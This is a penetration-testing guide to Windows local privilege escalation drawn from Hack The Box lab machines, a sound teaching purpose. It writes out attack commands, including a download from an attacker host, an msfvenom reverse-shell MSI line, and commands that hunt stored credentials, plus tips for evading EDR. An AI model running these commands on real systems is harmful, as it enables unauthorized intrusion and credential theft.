Windows Vulnerability Assessment

#Overview

Windows vulnerability assessment evaluates the local host configuration for privilege escalation opportunities after gaining an initial foothold. Unlike Active Directory misconfiguration assessment -- which focuses on domain-wide relationships -- this phase examines the specific machine you are on for patch levels, service permissions, scheduled tasks, registry configurations, and credential storage weaknesses.

The core methodology is: enumerate the OS version and installed patches, check for known missing critical updates, analyze service and task permissions, review registry configurations for privilege escalation vectors, and assess credential protection mechanisms. Tools like WinPEAS automate much of this collection, but the analyst must interpret the output and identify viable escalation paths.

On HTB, common Windows privilege escalation patterns include: SeImpersonatePrivilege leading to JuicyPotato/PrintSpoofer exploitation, AlwaysInstallElevated registry keys enabling MSI-based execution, unquoted service paths with writable parent directories, and discovered auto-logon credentials (Sauna -- WinPEAS found auto-logon password for a DCSync-capable user).

#Prerequisites

Low-privileged shell on a Windows machine (cmd, PowerShell, or WinRM)
Ability to upload files to the target (HTTP server, SMB share, certutil, bitsadmin)
Access to WinPEAS, accesschk, and PowerShell-based enumeration scripts
Metasploit post-exploitation modules (optional, for privilege escalation detection)
WES-NG (Windows Exploit Suggester Next Generation) for offline patch analysis

#Detection and Enumeration

#Step 1: Gather OS and Patch Information

Start with basic system information:

cmd.exe:

systeminfo
wmic qfe list brief
wmic os get version, caption, buildnumber
hostname
whoami /all
net user %username%

CMD

PowerShell:

Get-HotFix
Get-ComputerInfo
[System.Environment]::OSVersion.Version
$PSVersionTable

POWERSHELL

The systeminfo output provides the OS version and every installed hotfix. Copy this output to a file for WES-NG analysis.

#Step 2: Offline Patch Analysis with WES-NG

WES-NG compares installed patches against the Microsoft Security Bulletin database:

# On attacker machine
python3 wes.py systeminfo.txt --impact "Elevation of Privilege" --severity critical
python3 wes.py systeminfo.txt --hide "Internet Explorer" | grep -i "Elevation"

BASH

WES-NG identifies missing patches that could yield privilege escalation. Each finding includes the MS bulletin ID, CVE, and a link to the Microsoft advisory. Prioritize vulnerabilities with "Elevation of Privilege" impact and "Critical" severity.

#Step 3: Run Automated Enumeration with WinPEAS

WinPEAS is the most comprehensive local Windows enumeration tool:

# Download and run from memory
iwr http://<attacker_IP>:8000/winPEASany.exe -o winpeas.exe
.\winpeas.exe > peas_output.txt

POWERSHELL

WinPEAS checks over 200 privilege escalation vectors including:

Current user privileges (special attention to SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege)
Auto-logon credentials (registry: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon)
AlwaysInstallElevated registry keys
Service permissions and unquoted service paths
Scheduled tasks and their run-as context
Credentials in files, registry, and PowerShell history
DLL hijacking opportunities
PATH directories with writable permissions
UAC, AppLocker, and Credential Guard status

Example from Sauna (HTB): WinPEAS identified auto-logon credentials in the registry for a user (svc_loanmgr) who had DCSync rights, enabling direct escalation from local user to Domain Admin.

#Step 4: Service Permission Analysis

Check service configurations for privilege escalation vectors:

# List all services
sc query state= all

# Check individual service configuration
sc qc <service_name>

# accesschk (Sysinternals) for service permissions
accesschk.exe /accepteula -uwcqv <user> <service_name>
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

CMD

Key service vulnerabilities to identify:

Unquoted service paths with spaces and no quotes: C:\Program Files\My App\app.exe -> Windows tries C:\Program.exe, C:\Program Files\My.exe, then the full path
Writable service binaries or service directories
SERVICE_CHANGE_CONFIG permission on a service -> change the binary path to your payload
SERVICE_START and SERVICE_STOP permissions -> restart a service with a modified binary

#Step 5: Registry Analysis for Privilege Escalation

Critical registry keys to check:

AlwaysInstallElevated:

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

CMD

If both return 0x1, MSI files can be installed as SYSTEM. Generate a malicious MSI with msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o shell.msi.

UAC Configuration:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

CMD

Check values: EnableLUA (should be 1), ConsentPromptBehaviorAdmin (should be 2 for secure), and PromptOnSecureDesktop (should be 1).

PowerShell and Scripting Restrictions:

$ExecutionContext.SessionState.LanguageMode  # ConstrainedLanguage = restricted
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections
Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell"

POWERSHELL

LSA Protection:

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL

CMD

A value of 1 indicates LSA Protection is enabled, blocking Mimikatz from reading LSASS memory.

WDigest Configuration:

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

CMD

If set to 1 (or missing), credentials are stored in plaintext in LSASS memory.

Credential Guard:

Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

POWERSHELL

Credential Guard isolates LSASS in a virtualized environment (VBS), preventing credential dumping.

#Step 6: Credential and Sensitive File Discovery

Search for stored credentials and sensitive files:

# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Saved RDP connections
cmdkey /list

# Unattend files (Windows setup artifacts)
dir /s C:\Windows\Panther\Unattend*.xml
dir /s C:\Windows\Panther\Autounattend*.xml
dir /s C:\Windows\System32\sysprep\Unattend*.xml

# Group Policy Preferences (cpassword attribute)
findstr /s /i cpassword C:\Windows\SYSVOL\*.xml

CMD

On Timelapse, PowerShell history revealed svc_deploy credentials. On Sauna, WinPEAS found auto-logon credentials in the registry. On Access, saved credentials in Outlook personal archives and Access databases yielded user passwords.

#Step 7: Scheduled Task and Auto-Run Analysis

# Scheduled tasks
schtasks /query /fo LIST /v

# Auto-run entries
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

CMD

Look for:

Tasks running as SYSTEM that execute scripts from writable paths
Tasks that invoke scripts or binaries from user-writable directories
Auto-run entries pointing to executables in writable locations
Missing DLLs in a task's execution directory

#Step 8: DLL Hijacking Opportunities

Identify processes that load DLLs from user-writable directories:

Find a service or application that runs as SYSTEM
Use ProcMon (Process Monitor) to identify missing DLLs or DLLs loaded from writable directories
Place a malicious DLL in the search path

Common DLL hijacking targets: wlbsctrl.dll (IKEEXT service), TSMSISrv.dll (SessionEnv service).

#Assessment Methodology

#Privilege Escalation Strategy by Privilege

Prioritize based on the current user's privileges:

Privilege	Exploitation Method
SeImpersonatePrivilege	JuicyPotato, RoguePotato, PrintSpoofer, SweetPotato
SeAssignPrimaryTokenPrivilege	Same as SeImpersonate, Potato family
SeBackupPrivilege	Copy SAM/SYSTEM hives, then secretsdump
SeRestorePrivilege	Overwrite system files with malicious versions
SeTakeOwnershipPrivilege	Take ownership of SYSTEM-owned files and replace
SeDebugPrivilege	Access LSASS process memory, dump credentials
SeLoadDriverPrivilege	Load a malicious kernel driver
SeShutdownPrivilege	Not directly useful for escalation
SeIncreaseQuotaPrivilege	Combine with other exploits

#Privilege Escalation Strategy by OS Version

OS Version	Common Vectors
Windows Server 2016/2019/2022	Service misconfigurations, SeImpersonate (Potato), AD abuse, GPP cpassword, WES-NG findings
Windows 10/11	UAC bypass, AutoElevate binaries, AlwaysInstallElevated, DLL hijacking
Older (2008, 2012)	Kernel exploits (MS16-032, MS15-051, CVE-2020-1472 ZeroLogon), more Potato variants

#Common Pitfalls

Pitfall: Running WinPEAS and stopping without interpreting the output. The tool's color coding is a guide, not a verdict. Fix: Review every red/yellow finding manually; verify whether each finding is exploitable in your context.
Pitfall: Assuming systeminfo output alone is sufficient for patch analysis. Hotfix IDs can be misleading; backported patches on updated systems may not match the KB article naming convention. Fix: Use WES-NG which cross-references by build number and file version, not just KB IDs.
Pitfall: Ignoring whoami /priv output. A user with SeImpersonatePrivilege and a writable upload directory is often one Potato exploit away from SYSTEM. Fix: Always run whoami /all first and prioritize based on enabled privileges.
Pitfall: Not checking for credentials in PowerShell history. On Timelapse, the entire privilege escalation chain started from ConsoleHost_history.txt. Fix: Always check PowerShell history, saved RDP credentials, and unattended installation files.
Pitfall: Running kernel exploits on production systems without testing. Kernel exploits (MS16-032, MS15-051) are unreliable and can cause BSOD. Fix: Exhaust service, task, and registry-based escalation first; use kernel exploits as a last resort.

#OPSEC Considerations

Detection: Uploading and running WinPEAS generates process creation events and file artifacts. Many EDR solutions flag WinPEAS by name and hash. Fix: Rename the executable before upload, execute from memory when possible.
Detection: accesschk queries service permissions and generates audit events. The -v (verbose) flag increases detection footprint. Fix: Run without verbose output and target specific services.
Detection: Enumerating PowerShell history and saved credentials is low-noise and rarely triggers alerts. This is the safest form of enumeration.
Detection: Running WES-NG on the attacker's machine from a captured systeminfo file generates zero noise on the target.

#Cross-References

#Tool References

Tool	Link
WinPEAS	https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
WES-NG	https://github.com/bitsadmin/wesng
accesschk (Sysinternals)	https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk
JuicyPotato NG	https://github.com/antonioCoco/JuicyPotatoNG
PrintSpoofer	https://github.com/itm4n/PrintSpoofer
PowerUp (PowerSploit)	https://github.com/PowerShellMafia/PowerSploit
Seatbelt	https://github.com/GhostPack/Seatbelt
ProcMon (Sysinternals)	https://learn.microsoft.com/en-us/sysinternals/downloads/procmon
Mimikatz	https://github.com/gentilkiwi/mimikatz

#Source Machines

Sauna (Easy) -- WinPEAS discovered auto-logon credentials in registry, leading to DCSync-capable user
ServMon (Easy) -- NSClient++ web app privilege escalation to SYSTEM via script execution + service restart
Access (Easy) -- Saved credentials in Outlook PST files and Microsoft Access databases, DPAPI credential extraction
Timelapse (Easy) -- PowerShell history file disclosure (ConsoleHost_history.txt), LAPS_Readers group for Administrator password
Support (Easy) -- .NET binary decompilation (ILSpy) to discover hardcoded LDAP credentials
Escape (Medium) -- MSSQL service log file (ERRORLOG.bak) containing rejected password attempt, Certify for ADCS enumeration
Rebound (Insane) -- Cross-session NTLM relay, gMSA password extraction, RBCD-based impersonation chain